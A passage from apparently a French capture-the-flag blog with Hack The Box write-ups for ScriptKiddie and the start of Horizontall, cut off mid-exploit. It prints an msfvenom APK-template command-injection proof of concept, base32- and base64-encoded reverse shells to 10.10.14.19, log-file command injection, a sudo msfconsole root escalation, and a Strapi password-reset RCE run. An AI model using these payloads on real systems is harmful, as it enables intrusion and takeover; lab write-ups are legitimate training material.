ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/YB1g/YHwZNvTzj8lysM+SzX6dZzRbfF24y3ywkhai4pViGEwUklIPkEvuLSGH97NJ4y8r9uUXzyoq3iuVJ/vGXiFlPCrg+QDp7UnwANBmDqbVLucKdor+JkWHJJ1h3ftpEHgol54tj+6J7ftmaOR29Iwg+FKtcyNG6PY434cfA0Pwshw6kKgFa+HWljNl+41H3WVua4QItPmrh+CrSoaA5kCe0FAP3c2uHcv2JyDjgCQxmN1GoLtlAsEznHlHI1wycNZGcHDnqxEmovPTN4qisOKEbYfy2mu1Eqq3Phv8UfybV8c60wUqGtClj3YOO1apDZKEe8eZZqy5eXU8mIO+uXcp5zxJ/Wrgng7WTguXGzQJiBHSFq52fHFvIYSuJOYEusLWkGhiyvITYLWZgnNL+qAVxZtP80ZTq+lm4cJHJZKl0OYsmqO0LjlMOMTPFyA+W2IOgAmnM+miSmSZ6n6pnSA+LE2Pj01egIhHw5+duAYxUHYOnKLVak1WWk/C68<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJA31QhiIbYQMUwn/n3+qcrLiiJpYIia8HdgtwkI8JkCDm2n+j6dB3u5I17IOPXE7n5iPiW9tPF3Nb0aXmVJmlo<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOWjCdxetuUPIPnEGrowvR7qRAR7nuhUbfFraZFmbIr4 </span></span><span class="line"><span class="cl">5000/tcp open http syn-ack ttl <span class="m">63</span> Werkzeug httpd 0.16.1 <span class="o">(</span>Python 3.8.5<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET OPTIONS HEAD POST </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Werkzeug/0.16.1 Python/3.8.5 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: k1d<span class="err">&#39;</span><span class="m">5</span> h4ck3r t00l5 </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="msfvenom---apk-template-injection">msfvenom - apk template injection </h3><p>On a accès a une page web sur le port 5000 où plusieurs commandes peuvent etre executés, on a notamment:</p> <p><code>venom it up - gen rev tcp meterpreter bins</code> qui nous permet de generer avec msfvenom un reverse meterpreter facilement pour android, linux, windows.</p> <p>On a le droit de mettre un fichier template. Après une recherche sur internet et sur searchsploit, on observe une vuln dans l&rsquo;outil msfvenom.</p> <p>Si on execute msfvenom pour le meterpreter android, en passant un apk vérolé en template(-x), on a une RCE :</p> <blockquote> <p>msfvenom -x /tmp/tmp9ep2m3p9/poc.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># APK TEMPLATE FILE CREATION PYTHON SCRIPT</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">#!/usr/bin/env python3</span> </span></span><span class="line"><span class="cl">import subprocess </span></span><span class="line"><span class="cl">import tempfile </span></span><span class="line"><span class="cl">import os </span></span><span class="line"><span class="cl">from base64 import b32encode </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Change me</span> </span></span><span class="line"><span class="cl"><span class="nv">payload</span> <span class="o">=</span> <span class="s1">&#39;sh -i &gt;&amp; /dev/tcp/10.10.14.19/1337 0&gt;&amp;1&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># b32encode to avoid badchars (keytool is picky)</span> </span></span><span class="line"><span class="cl"><span class="c1"># thanks to @fdellwing for noticing that base64 can sometimes break keytool</span> </span></span><span class="line"><span class="cl"><span class="c1"># &lt;https://github.com/justinsteven/advisories/issues/2&gt;</span> </span></span><span class="line"><span class="cl"><span class="nv">payload_b32</span> <span class="o">=</span> b32encode<span class="o">(</span>payload.encode<span class="o">())</span>.decode<span class="o">()</span> </span></span><span class="line"><span class="cl"><span class="nv">dname</span> <span class="o">=</span> f<span class="s2">&#34;CN=&#39;|echo {payload_b32} | base32 -d | sh #&#34;</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ python3 poc.py </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Manufacturing evil apkfile </span></span><span class="line"><span class="cl">Payload: sh -i &gt;<span class="p">&amp;</span> /dev/tcp/10.10.14.19/1337 0&gt;<span class="p">&amp;</span><span class="m">1</span> </span></span><span class="line"><span class="cl">-dname: <span class="nv">CN</span><span class="o">=</span><span class="s1">&#39;|echo ONUCALLJEA7CMIBPMRSXML3UMNYC6MJQFYYTALRRGQXDCOJPGEZTGNZAGA7CMMI= | base32 -d | sh # </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> adding: empty (stored 0%) </span></span></span><span class="line"><span class="cl"><span class="s1">Génération d&#39;</span>une paire de clés RSA de 2 <span class="m">048</span> bits et d<span class="s1">&#39;un certificat auto-signé (SHA256withRSA) d&#39;</span>une validité de <span class="m">90</span> jours </span></span><span class="line"><span class="cl"> pour : <span class="nv">CN</span><span class="o">=</span><span class="s2">&#34;&#39;|echo ONUCALLJEA7CMIBPMRSXML3UMNYC6MJQFYYTALRRGQXDCOJPGEZTGNZAGA7CMMI= | base32 -d | sh #&#34;</span> </span></span><span class="line"><span class="cl">jar signed. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: </span></span><span class="line"><span class="cl">The signer<span class="s1">&#39;s certificate is self-signed. </span></span></span><span class="line"><span class="cl"><span class="s1">The SHA1 algorithm specified for the -digestalg option is considered a security risk and is disabled. </span></span></span><span class="line"><span class="cl"><span class="s1">The SHA1withRSA algorithm specified for the -sigalg option is considered a security risk and is disabled. </span></span></span><span class="line"><span class="cl"><span class="s1">POSIX file permission and/or symlink attributes detected. These attributes are ignored when signing and are not protected by the signature. </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Done! apkfile is at /tmp/tmp9ep2m3p9/poc.apk </span></span></span><span class="line"><span class="cl"><span class="s1">Do: msfvenom -x /tmp/tmp9ep2m3p9/poc.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">--------------------------------- </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">┌──(kali㉿kali)-[~/htb/ScriptKiddie] </span></span></span><span class="line"><span class="cl"><span class="s1">└─$ nc -lnvp 1337 </span></span></span><span class="line"><span class="cl"><span class="s1">listening on [any] 1337 ... </span></span></span><span class="line"><span class="cl"><span class="s1">connect to [10.10.14.19] from (UNKNOWN) [10.10.10.226] 55968 </span></span></span><span class="line"><span class="cl"><span class="s1">sh: 0: can&#39;</span>t access tty<span class="p">;</span> job control turned off </span></span><span class="line"><span class="cl">$ whoami </span></span><span class="line"><span class="cl">kid </span></span><span class="line"><span class="cl">$ cat /home/kid/user.txt </span></span><span class="line"><span class="cl">be0d.....478d </span></span></code></pre></td></tr></table> </div> </div><h2 id="kid---pwn">kid -&gt; pwn </h2><h3 id="homepwnscanloserssh">/home/pwn/scanlosers.sh </h3><p>On observe un script qu&rsquo;on peut lire dans le home directory de l&rsquo;utilisateur pwn. On découvre egalement un fichier &ldquo;hackers&rdquo; dans dossiers logs/ de kid (notre utilisateur).</p> <p>Le script de pwn effectue un nmap sur une ip lorsqu&rsquo;une nouvelle ligne est ajouté dans le fichier de logs hackers. Dans ce cas, il récupère l&rsquo;ip ecrite en 3ème position sur la ligne, puis fait le nmap. Ensuite, il vide le fichier hackers.</p> <p>On remarque bien que lorsqu&rsquo;on ajoute une ligne dans le fichier hackers, il est immédiatement effacé, ce qui prouve que l&rsquo;utilisateur pwn execute en permanence le script scanlosers.sh.</p> <p>On peut facilement injecter une commande dans le fichier &ldquo;hackers&rdquo; a la place de l&rsquo;addresse ip. Cette commande sera ensuite executer par pwn lors de l&rsquo;execution du script scanlosers.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Reverse shell en base64</span> </span></span><span class="line"><span class="cl">kid@scriptkiddie:/home/pwn$ <span class="nb">echo</span> -n <span class="s1">&#39;a a $(echo &#34;c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTkvNDQ0NCAwPiYx&#34; | base64 -d | bash)&#39;</span> &gt;&gt; /home/kid/logs/hackers </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/ScriptKiddie<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">4444</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">4444</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.19<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.226<span class="o">]</span> <span class="m">56352</span> </span></span><span class="line"><span class="cl">sh: 0: can<span class="err">&#39;</span>t access tty<span class="p">;</span> job control turned off </span></span><span class="line"><span class="cl">$ whoami </span></span><span class="line"><span class="cl">pwn </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="msfconsole-as-root">msfconsole as root </h3><p>On remarque la possibilité d&rsquo;executer <code>msfconsole</code> en tant que root. En regardant sur <strong>gtfobins</strong>, on trouve directement un moyen d&rsquo;ouvrir un shell en tant que root depuis msfconsole</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">pwn@scriptkiddie:~$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> pwn on scriptkiddie: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, </span></span><span class="line"><span class="cl"> <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User pwn may run the following commands on scriptkiddie: </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole </span></span><span class="line"><span class="cl">pwn@scriptkiddie:~$ sudo msfconsole </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1">###### ############</span> </span></span><span class="line"><span class="cl"> <span class="c1">#######################</span> </span></span><span class="line"><span class="cl"> <span class="c1"># # ### # # ##</span> </span></span><span class="line"><span class="cl"> <span class="c1">########################</span> </span></span><span class="line"><span class="cl"> <span class="c1">## ## ## ##</span> </span></span><span class="line"><span class="cl"> https://metasploit.com </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">=[</span> metasploit v6.0.9-dev <span class="o">]</span> </span></span><span class="line"><span class="cl">+ -- --<span class="o">=[</span> <span class="m">2069</span> exploits - <span class="m">1122</span> auxiliary - <span class="m">352</span> post <span class="o">]</span> </span></span><span class="line"><span class="cl">+ -- --<span class="o">=[</span> <span class="m">592</span> payloads - <span class="m">45</span> encoders - <span class="m">10</span> nops <span class="o">]</span> </span></span><span class="line"><span class="cl">+ -- --<span class="o">=[</span> <span class="m">7</span> evasion <span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Metasploit tip: Use the edit <span class="nb">command</span> to open the currently active module in your editor </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">msf6 &gt; msf6 &gt; irb </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Unknown command: msf6. </span></span><span class="line"><span class="cl">msf6 &gt; irb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting IRB shell... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> You are in the <span class="s2">&#34;framework&#34;</span> object </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">irb: warn: can<span class="s1">&#39;t alias jobs from irb_jobs. </span></span></span><span class="line"><span class="cl"><span class="s1">&gt;&gt; system(&#39;</span>/bin/sh<span class="err">&#39;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="c1"># whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1"># cat /root/root.txt </span> </span></span><span class="line"><span class="cl">1f30.....dd22 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/horizontall-htb/Thu, 06 Mar 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/horizontall-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Horizontall cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Horizontall</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.105</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Horizontall<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -T4 -vvv 10.10.11.105 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL2qJTqj1aoxBGb8yWIN4UJwFs4/UgDEutp3aiL2/6yV2iE78YjGzfU74VKlTRvJZWBwDmIOosOBNl9nfmEzXerD0g5lD5SporBx06eWX/XP2sQSEKbsqkr7Qb4ncvU8CvDR6yGHxmBT8WGgaQsA2ViVjiqAdlUDmLoT2qA3GeLBQgS41e+TysTpzWlY7z/rf/u0uj/C3kbixSB/upkWoqGyorDtFoaGGvWet/q7j5Tq061MaR6cM2CrYcQxxnPy4LqFE3MouLklBXfmNovryI0qVFMki7Cc3hfXz6BmKppCzMUPs8VgtNgdcGywIU/Nq1aiGQfATneqDD2GBXLjzV </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIyw6WbPVzY28EbBOZ4zWcikpu/CPcklbTUwvrPou4dCG4koataOo/RDg4MJuQP+sR937/ugmINBJNsYC8F7jN0<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJqmDVbv9RjhlUzOMmw3SrGPaiDBgdZ9QZ2cKM49jzYB </span></span><span class="line"><span class="cl">80/tcp open http syn-ack nginx 1.14.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to http://horizontall.htb </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: nginx/1.14.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl">Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold--strapi-cms">Foothold : Strapi CMS </h2><h3 id="subdomain-enumeration--api-prodhorizontallhtb">Subdomain enumeration : api-prod.horizontall.htb </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ffuf -w /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb -H <span class="s2">&#34;Host: FUZZ.horizontall.htb&#34;</span> -mc <span class="m">200</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> /<span class="s1">&#39;___\ /&#39;</span>___<span class="se">\ </span> /<span class="err">&#39;</span>___<span class="se">\ </span> </span></span><span class="line"><span class="cl"> /<span class="se">\ \_</span>_/ /<span class="se">\ \_</span>_/ __ __ /<span class="se">\ \_</span>_/ </span></span><span class="line"><span class="cl"> <span class="se">\ \ </span>,__<span class="se">\\</span> <span class="se">\ </span>,__<span class="se">\/\ \/\ \ \ \ </span>,__<span class="se">\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\ \ \_</span>/ <span class="se">\ \ \_</span>/<span class="se">\ \ \_\ \ \ \ \_</span>/ </span></span><span class="line"><span class="cl"> <span class="se">\ \_\ </span> <span class="se">\ \_\ </span> <span class="se">\ \_</span>___/ <span class="se">\ \_\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\/</span>_/ <span class="se">\/</span>_/ <span class="se">\/</span>___/ <span class="se">\/</span>_/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> v2.1.0-dev </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> :: Method : GET </span></span><span class="line"><span class="cl"> :: URL : http://horizontall.htb </span></span><span class="line"><span class="cl"> :: Wordlist : FUZZ: /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt </span></span><span class="line"><span class="cl"> :: Header : Host: FUZZ.horizontall.htb </span></span><span class="line"><span class="cl"> :: Follow redirects : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Calibration : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Timeout : <span class="m">10</span> </span></span><span class="line"><span class="cl"> :: Threads : <span class="m">40</span> </span></span><span class="line"><span class="cl"> :: Matcher : Response status: <span class="m">200</span> </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www <span class="o">[</span>Status: 200, Size: 901, Words: 43, Lines: 2, Duration: 30ms<span class="o">]</span> </span></span><span class="line"><span class="cl">api-prod <span class="o">[</span>Status: 200, Size: 413, Words: 76, Lines: 20, Duration: 57ms<span class="o">]</span> </span></span><span class="line"><span class="cl">:: Progress: <span class="o">[</span>114441/114441<span class="o">]</span> :: Job <span class="o">[</span>1/1<span class="o">]</span> :: <span class="m">2020</span> req/sec :: Duration: <span class="o">[</span>0:01:02<span class="o">]</span> :: Errors: <span class="m">0</span> :: </span></span></code></pre></td></tr></table> </div> </div><p><a class="link" href="http://api-prod.horizontall.htb/admin/strapiVersion" target="_blank" rel="noopener" >http://api-prod.horizontall.htb/admin/strapiVersion</a> &ndash;&gt; 3.0.0-beta.17.4</p> <h3 id="cve--strapi-300-beta174">CVE : Strapi 3.0.0-beta.17.4 </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Horizontall<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ searchsploit strapi 3.0.0-beta.17.4 </span></span><span class="line"><span class="cl">------------------------------------------- </span></span><span class="line"><span class="cl"> Exploit Title <span class="p">|</span> Path </span></span><span class="line"><span class="cl">------------------------------------------- </span></span><span class="line"><span class="cl">Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution <span class="o">(</span>RCE<span class="o">)</span> <span class="o">(</span>Unauthenticated<span class="o">)</span> <span class="p">|</span> multiple/webapps/50239.py </span></span><span class="line"><span class="cl">Strapi CMS 3.0.0-beta.17.4 - Set Password <span class="o">(</span>Unauthenticated<span class="o">)</span> <span class="o">(</span>Metasploit<span class="o">)</span> <span class="p">|</span> nodejs/webapps/50716.rb </span></span><span class="line"><span class="cl">------------------------------------------- </span></span><span class="line"><span class="cl">Shellcodes: No Results </span></span></code></pre></td></tr></table> </div> </div><h3 id="strapi-rce">Strapi RCE </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Horizontall<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 50239.py http://api-prod.horizontall.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Checking Strapi CMS Version running </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Seems like the exploit will work!!! </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Executing exploit </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Password reset was successfully </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Your email is: admin@horizontall.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Your new credentials are: admin:SuperStrongPassword1 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Your authenticated JSON Web Token: 